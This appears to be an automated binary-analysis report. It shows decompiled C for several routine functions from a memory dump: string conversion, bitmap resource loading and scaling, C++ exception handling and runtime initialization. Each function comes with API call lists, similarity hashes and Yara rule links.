                                                                                                                                                    Function 0123BF68, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                    			E0123BF68(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x124d668; // 0x6c4f95b1
				_v8 = _t34 ^ _t70;
				E01233C16(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x7fe85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E0122EA8A(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E0122F1A0(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E0123A140(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E01238398(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E01241870();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                                                                                                                                                    0x0123bf70
                                                                                                                                                    0x0123bf77
                                                                                                                                                    0x0123bf83
                                                                                                                                                    0x0123bf88
                                                                                                                                                    0x0123bf8d
                                                                                                                                                    0x0123bf92
                                                                                                                                                    0x0123bf92
                                                                                                                                                    0x0123bf95
                                                                                                                                                    0x0123bf97
                                                                                                                                                    0x0123bf97
                                                                                                                                                    0x0123bf9c
                                                                                                                                                    0x0123bfb5
                                                                                                                                                    0x0123bfbb
                                                                                                                                                    0x0123bfc0
                                                                                                                                                    0x0123c05f
                                                                                                                                                    0x0123c063
                                                                                                                                                    0x0123c068
                                                                                                                                                    0x0123c068
                                                                                                                                                    0x0123c084
                                                                                                                                                    0x0123c084
                                                                                                                                                    0x0123bfc6
                                                                                                                                                    0x0123bfce
                                                                                                                                                    0x0123bfd2
                                                                                                                                                    0x0123c01e
                                                                                                                                                    0x0123c020
                                                                                                                                                    0x0123c022
                                                                                                                                                    0x0123c027
                                                                                                                                                    0x0123c03e
                                                                                                                                                    0x0123c046
                                                                                                                                                    0x0123c056
                                                                                                                                                    0x0123c056
                                                                                                                                                    0x0123c046
                                                                                                                                                    0x0123c058
                                                                                                                                                    0x0123c059
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123c05e
                                                                                                                                                    0x0123bfd9
                                                                                                                                                    0x0123bfdb
                                                                                                                                                    0x0123bfdd
                                                                                                                                                    0x0123bfe5
                                                                                                                                                    0x0123c002
                                                                                                                                                    0x0123c00c
                                                                                                                                                    0x0123c011
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123c013
                                                                                                                                                    0x0123c019
                                                                                                                                                    0x0123c019
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123c019
                                                                                                                                                    0x0123bfe9
                                                                                                                                                    0x0123bfed
                                                                                                                                                    0x0123bff2
                                                                                                                                                    0x0123bff6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123bff8
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,7FE85006,01233DA6,00000000,00000000,01234DDB,?,01234DDB,?,00000001,01233DA6,7FE85006,00000001,01234DDB,01234DDB), ref: 0123BFB5
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0123C03E
                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0123C050
                                                                                                                                                    • __freea.LIBCMT ref: 0123C059
                                                                                                                                                      • Part of subcall function 01238398: RtlAllocateHeap.NTDLL(00000000,?,?,?,01233866,?,0000015D,?,?,?,?,01234D42,000000FF,00000000,?,?), ref: 012383CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                    • Opcode ID: 1b054ec8a0d2374a87ada5115ae555378646a0fd742db50c5b66191152e6c430
                                                                                                                                                    • Instruction ID: d4dadbb4513b32c06b6c0a7e26e967aa06448353292f05e742f0078ca7a8bd07
                                                                                                                                                    • Opcode Fuzzy Hash: 1b054ec8a0d2374a87ada5115ae555378646a0fd742db50c5b66191152e6c430
                                                                                                                                                    • Instruction Fuzzy Hash: 0C31E7B2A2025B9BDF25CF65DC44EBEBBA5EF81610F040129FD14E7150D735C964CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122AD3D, Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0122AD3D(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0x124fed0, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E01229D9A(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E01229C8A(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E01229D9A(0x66);
						if(_t26 != 0) {
							DeleteObject(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E01229CEC(_v20);
					_t13 = E01229EDB(_t21, _t32, _t22, E01229CA9(_v24), _t11);
					DeleteObject(_t22);
					_t22 = _t13;
				}
				return _t22;
			}














                                                                                                                                                    0x0122ad3d
                                                                                                                                                    0x0122ad3d
                                                                                                                                                    0x0122ad53
                                                                                                                                                    0x0122ad57
                                                                                                                                                    0x0122ad5a
                                                                                                                                                    0x0122ad5c
                                                                                                                                                    0x0122ad65
                                                                                                                                                    0x0122ad65
                                                                                                                                                    0x0122ad6e
                                                                                                                                                    0x0122ad7b
                                                                                                                                                    0x0122ad80
                                                                                                                                                    0x0122ad89
                                                                                                                                                    0x0122ad8d
                                                                                                                                                    0x0122ad90
                                                                                                                                                    0x0122ad96
                                                                                                                                                    0x0122ad96
                                                                                                                                                    0x0122ad8d
                                                                                                                                                    0x0122ad9b
                                                                                                                                                    0x0122adab
                                                                                                                                                    0x0122adb3
                                                                                                                                                    0x0122adb9
                                                                                                                                                    0x0122adbb
                                                                                                                                                    0x0122adc3

                                                                                                                                                    APIs
                                                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0122AD4D
                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0122AD6E
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0122AD90
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0122ADB3
                                                                                                                                                      • Part of subcall function 01229D9A: FindResourceW.KERNELBASE(0122AD89,PNG,?,?,?,0122AD89,00000066), ref: 01229DAC
                                                                                                                                                      • Part of subcall function 01229D9A: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0122AD89,00000066), ref: 01229DC4
                                                                                                                                                      • Part of subcall function 01229D9A: LoadResource.KERNEL32(00000000,?,?,?,0122AD89,00000066), ref: 01229DD7
                                                                                                                                                      • Part of subcall function 01229D9A: LockResource.KERNEL32(00000000,?,?,?,0122AD89,00000066), ref: 01229DE2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 142272564-0
                                                                                                                                                    • Opcode ID: 7eb2ad024b27dad51956d76196f77d6f4fc6ef9412019014d7e1e4307d01161f
                                                                                                                                                    • Instruction ID: 69e1f312a390de14d7ee90c1a9eb34f2745702b412ba0cbaa4b0d801d8b21167
                                                                                                                                                    • Opcode Fuzzy Hash: 7eb2ad024b27dad51956d76196f77d6f4fc6ef9412019014d7e1e4307d01161f
                                                                                                                                                    • Instruction Fuzzy Hash: 7601AC366A013777DB323768AD0997F7A6DAF96A52F080015FE00A7688DD218C1557B0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01232319, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 20%
                                                                                                                                                    			E01232319(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E01232968(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0122FA5B(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E01232B6A(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E01232123(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0122FA29(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












                                                                                                                                                    0x01232319
                                                                                                                                                    0x01232319
                                                                                                                                                    0x0123231c
                                                                                                                                                    0x01232321
                                                                                                                                                    0x01232324
                                                                                                                                                    0x01232326
                                                                                                                                                    0x01232329
                                                                                                                                                    0x0123232c
                                                                                                                                                    0x0123232d
                                                                                                                                                    0x01232330
                                                                                                                                                    0x01232335
                                                                                                                                                    0x01232335
                                                                                                                                                    0x01232338
                                                                                                                                                    0x0123233c
                                                                                                                                                    0x0123233f
                                                                                                                                                    0x01232344
                                                                                                                                                    0x01232341
                                                                                                                                                    0x01232341
                                                                                                                                                    0x01232341
                                                                                                                                                    0x01232347
                                                                                                                                                    0x0123234d
                                                                                                                                                    0x01232350
                                                                                                                                                    0x01232352
                                                                                                                                                    0x01232355
                                                                                                                                                    0x01232358
                                                                                                                                                    0x01232359
                                                                                                                                                    0x01232362
                                                                                                                                                    0x01232367
                                                                                                                                                    0x0123236a
                                                                                                                                                    0x01232370
                                                                                                                                                    0x01232373
                                                                                                                                                    0x01232376
                                                                                                                                                    0x01232379
                                                                                                                                                    0x0123237a
                                                                                                                                                    0x0123237d
                                                                                                                                                    0x01232388
                                                                                                                                                    0x0123238c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123238c
                                                                                                                                                    0x01232393

                                                                                                                                                    APIs
                                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 01232330
                                                                                                                                                      • Part of subcall function 01232968: ___AdjustPointer.LIBCMT ref: 012329B2
                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 01232347
                                                                                                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 01232359
                                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 0123237D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2633735394-0
                                                                                                                                                    • Opcode ID: 85922d69eac58b553849b4939f9ebe2b6291e1533c257ba7745a1c0a1e2d1bc0
                                                                                                                                                    • Instruction ID: 211e0a7c9b984912c5d26fb1401afbe7581f683a6f7201dad31c25b1685f5c6a
                                                                                                                                                    • Opcode Fuzzy Hash: 85922d69eac58b553849b4939f9ebe2b6291e1533c257ba7745a1c0a1e2d1bc0
                                                                                                                                                    • Instruction Fuzzy Hash: CA01E57212010AFBCF129F55DD00EEA3BBAFF98754F158015FE5866120D372E861EBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01231E66, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E01231E66() {
				void* _t4;
				void* _t8;

				E01233274();
				E01233208();
				if(E01232F2E() != 0) {
					_t4 = E01231FAC(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E01232F6A();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                                                                                                                    0x01231e66
                                                                                                                                                    0x01231e6b
                                                                                                                                                    0x01231e77
                                                                                                                                                    0x01231e7c
                                                                                                                                                    0x01231e81
                                                                                                                                                    0x01231e83
                                                                                                                                                    0x01231e8e
                                                                                                                                                    0x01231e85
                                                                                                                                                    0x01231e85
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01231e85
                                                                                                                                                    0x01231e79
                                                                                                                                                    0x01231e79
                                                                                                                                                    0x01231e7b
                                                                                                                                                    0x01231e7b

                                                                                                                                                    APIs
                                                                                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 01231E66
                                                                                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 01231E6B
                                                                                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 01231E70
                                                                                                                                                      • Part of subcall function 01232F2E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 01232F3F
                                                                                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 01231E85
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1761009282-0
                                                                                                                                                    • Opcode ID: db56094726013a0e7960dbb605aab973f1732d5fd0b5120fa08f3f94fc27d9a5
                                                                                                                                                    • Instruction ID: 8b64ceac34fe2ad6a6ed81d930aea8cfebd6f584e9666d1db2d00dcee9e4b732
                                                                                                                                                    • Opcode Fuzzy Hash: db56094726013a0e7960dbb605aab973f1732d5fd0b5120fa08f3f94fc27d9a5
                                                                                                                                                    • Instruction Fuzzy Hash: 7CC048CC130313A62C227AB822002BE63442CF7AC9B8012C18AA02B0279A6B096A9476
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01229EDB, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 24%
                                                                                                                                                    			E01229EDB(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				intOrPtr _v116;
				void* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v152;
				signed int _v160;
				intOrPtr _v164;
				char _v180;
				intOrPtr* _v192;
				intOrPtr* _v200;
				signed int _v208;
				char _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr* _v232;
				intOrPtr* _v240;
				void* _v256;
				intOrPtr* _v264;
				void* __edi;
				signed int _t78;
				intOrPtr* _t84;
				void* _t86;
				signed int _t87;
				signed int _t90;
				short _t100;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t110;
				intOrPtr* _t116;
				intOrPtr* _t128;
				intOrPtr* _t131;
				intOrPtr* _t134;
				void* _t141;
				intOrPtr* _t146;
				intOrPtr* _t158;
				intOrPtr* _t161;
				signed int _t175;
				void* _t177;
				void* _t179;
				intOrPtr* _t181;
				signed int _t195;
				long long* _t197;
				long long _t200;

				_t200 = __fp0;
				if(E01229D6F() != 0) {
					_t141 = _a4;
					GetObjectW(_t141, 0x18,  &_v68);
					_t195 = _v0;
					asm("cdq");
					_t78 = _v72 * _v4 / _v76;
					if(_t78 < _t195) {
						_t195 = _t78;
					}
					_t177 = 0;
					_push( &_v120);
					_push(0x1243684);
					_push(1);
					_push(0);
					_push(0x124444c);
					if( *0x1271174() < 0) {
						L19:
						return _t141;
					} else {
						_t84 = _v140;
						 *0x1242260(_t84, _t141, 0, 2,  &_v136, _t179);
						_t86 =  *((intOrPtr*)( *_t84 + 0x54))();
						_t87 = _v160;
						if(_t86 >= 0) {
							_v152 = 0;
							_t181 =  *((intOrPtr*)( *_t87 + 0x28));
							_t146 = _t181;
							 *0x1242260(_t87,  &_v152);
							if( *_t181() >= 0) {
								_t90 = _v160;
								asm("fldz");
								 *_t197 = _t200;
								 *0x1242260(_t90, _v164, 0x124445c, 0, 0, _t146, _t146, 0);
								if( *((intOrPtr*)( *_t90 + 0x20))() >= 0) {
									E0122F1A0(0,  &_v136, 0, 0x2c);
									_v132 = _v84;
									_v136 = 0x28;
									_v128 =  ~_t195;
									_v120 = 0;
									_v124 = 1;
									_t100 = 0x20;
									_v122 = _t100;
									_t103 =  *0x127105c(0,  &_v136, 0,  &_v180, 0, 0);
									_v208 = _t103;
									asm("sbb ecx, ecx");
									if(( ~_t103 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t158 = _v224;
										 *0x1242260(_t158,  &_v212);
										 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x2c))))();
										_t116 = _v220;
										 *0x1242260(_t116, _v228, _v116, _t195, 3);
										 *((intOrPtr*)( *_t116 + 0x20))();
										_t175 = _v136;
										_t161 = _v240;
										_v220 = _t175;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t195;
										 *0x1242260(_t161,  &_v228, _t175 << 2, _t175 * _t195 << 2, _v232);
										if( *((intOrPtr*)( *_t161 + 0x1c))() < 0) {
											DeleteObject(_v256);
										} else {
											_t177 = _v256;
										}
										_t128 = _v264;
										 *0x1242260(_t128);
										 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 8))))();
									}
									_t104 = _v220;
									 *0x1242260(_t104);
									 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
									_t107 = _v220;
									 *0x1242260(_t107);
									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))();
									_t110 = _v232;
									 *0x1242260(_t110);
									 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 8))))();
									if(_t177 != 0) {
										_t141 = _t177;
									}
									L18:
									goto L19;
								}
								_t131 = _v192;
								 *0x1242260(_t131);
								 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 8))))();
							}
							_t134 = _v200;
							 *0x1242260(_t134);
							 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 8))))();
							_t87 = _v208;
						}
						 *0x1242260(_t87);
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))();
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E0122A163();
			}



























































                                                                                                                                                    0x01229edb
                                                                                                                                                    0x01229ee5
                                                                                                                                                    0x01229efe
                                                                                                                                                    0x01229f0b
                                                                                                                                                    0x01229f1a
                                                                                                                                                    0x01229f21
                                                                                                                                                    0x01229f22
                                                                                                                                                    0x01229f28
                                                                                                                                                    0x01229f2a
                                                                                                                                                    0x01229f2a
                                                                                                                                                    0x01229f31
                                                                                                                                                    0x01229f33
                                                                                                                                                    0x01229f34
                                                                                                                                                    0x01229f3c
                                                                                                                                                    0x01229f3d
                                                                                                                                                    0x01229f3e
                                                                                                                                                    0x01229f4b
                                                                                                                                                    0x0122a158
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01229f51
                                                                                                                                                    0x01229f51
                                                                                                                                                    0x01229f65
                                                                                                                                                    0x01229f6b
                                                                                                                                                    0x01229f70
                                                                                                                                                    0x01229f74
                                                                                                                                                    0x01229f8b
                                                                                                                                                    0x01229f97
                                                                                                                                                    0x01229f9a
                                                                                                                                                    0x01229f9c
                                                                                                                                                    0x01229fa6
                                                                                                                                                    0x01229fc2
                                                                                                                                                    0x01229fc6
                                                                                                                                                    0x01229fcd
                                                                                                                                                    0x01229fdf
                                                                                                                                                    0x01229fea
                                                                                                                                                    0x0122a00a
                                                                                                                                                    0x0122a019
                                                                                                                                                    0x0122a021
                                                                                                                                                    0x0122a029
                                                                                                                                                    0x0122a032
                                                                                                                                                    0x0122a036
                                                                                                                                                    0x0122a03b
                                                                                                                                                    0x0122a03e
                                                                                                                                                    0x0122a04f
                                                                                                                                                    0x0122a057
                                                                                                                                                    0x0122a05d
                                                                                                                                                    0x0122a06b
                                                                                                                                                    0x0122a071
                                                                                                                                                    0x0122a082
                                                                                                                                                    0x0122a088
                                                                                                                                                    0x0122a08a
                                                                                                                                                    0x0122a0a2
                                                                                                                                                    0x0122a0a8
                                                                                                                                                    0x0122a0ab
                                                                                                                                                    0x0122a0b8
                                                                                                                                                    0x0122a0bf
                                                                                                                                                    0x0122a0c3
                                                                                                                                                    0x0122a0c7
                                                                                                                                                    0x0122a0cb
                                                                                                                                                    0x0122a0e4
                                                                                                                                                    0x0122a0ef
                                                                                                                                                    0x0122a0fb
                                                                                                                                                    0x0122a0f1
                                                                                                                                                    0x0122a0f1
                                                                                                                                                    0x0122a0f1
                                                                                                                                                    0x0122a101
                                                                                                                                                    0x0122a10d
                                                                                                                                                    0x0122a113
                                                                                                                                                    0x0122a113
                                                                                                                                                    0x0122a115
                                                                                                                                                    0x0122a121
                                                                                                                                                    0x0122a127
                                                                                                                                                    0x0122a129
                                                                                                                                                    0x0122a135
                                                                                                                                                    0x0122a13b
                                                                                                                                                    0x0122a13d
                                                                                                                                                    0x0122a149
                                                                                                                                                    0x0122a14f
                                                                                                                                                    0x0122a153
                                                                                                                                                    0x0122a155
                                                                                                                                                    0x0122a155
                                                                                                                                                    0x0122a157
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a157
                                                                                                                                                    0x01229fec
                                                                                                                                                    0x01229ff8
                                                                                                                                                    0x01229ffe
                                                                                                                                                    0x01229ffe
                                                                                                                                                    0x01229fa8
                                                                                                                                                    0x01229fb4
                                                                                                                                                    0x01229fba
                                                                                                                                                    0x01229fbc
                                                                                                                                                    0x01229fbc
                                                                                                                                                    0x01229f7e
                                                                                                                                                    0x01229f84
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01229f84
                                                                                                                                                    0x01229f4b
                                                                                                                                                    0x01229ee7
                                                                                                                                                    0x01229eeb
                                                                                                                                                    0x01229eef
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 01229D6F: GetDC.USER32(00000000), ref: 01229D73
                                                                                                                                                      • Part of subcall function 01229D6F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 01229D7E
                                                                                                                                                      • Part of subcall function 01229D6F: ReleaseDC.USER32(00000000,00000000), ref: 01229D89
                                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 01229F0B
                                                                                                                                                      • Part of subcall function 0122A163: GetDC.USER32(00000000), ref: 0122A16C
                                                                                                                                                      • Part of subcall function 0122A163: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,01229EF8,?,?,?), ref: 0122A19B
                                                                                                                                                      • Part of subcall function 0122A163: ReleaseDC.USER32(00000000,?), ref: 0122A233
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 1061551593-3887548279
                                                                                                                                                    • Opcode ID: 9bcd97be6e4983631453b279e3d34797d0dc54bdd28f7771ab8791245b590825
                                                                                                                                                    • Instruction ID: b5d5dbd16e0670e2e8250d93b6f3fb6e951faafd464183f79d2eb5d474a58713
                                                                                                                                                    • Opcode Fuzzy Hash: 9bcd97be6e4983631453b279e3d34797d0dc54bdd28f7771ab8791245b590825
                                                                                                                                                    • Instruction Fuzzy Hash: 86811375218355EFC714DF65E848A2ABBE9FF88B14F00491DF98AD7260CB70AD05CB52
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

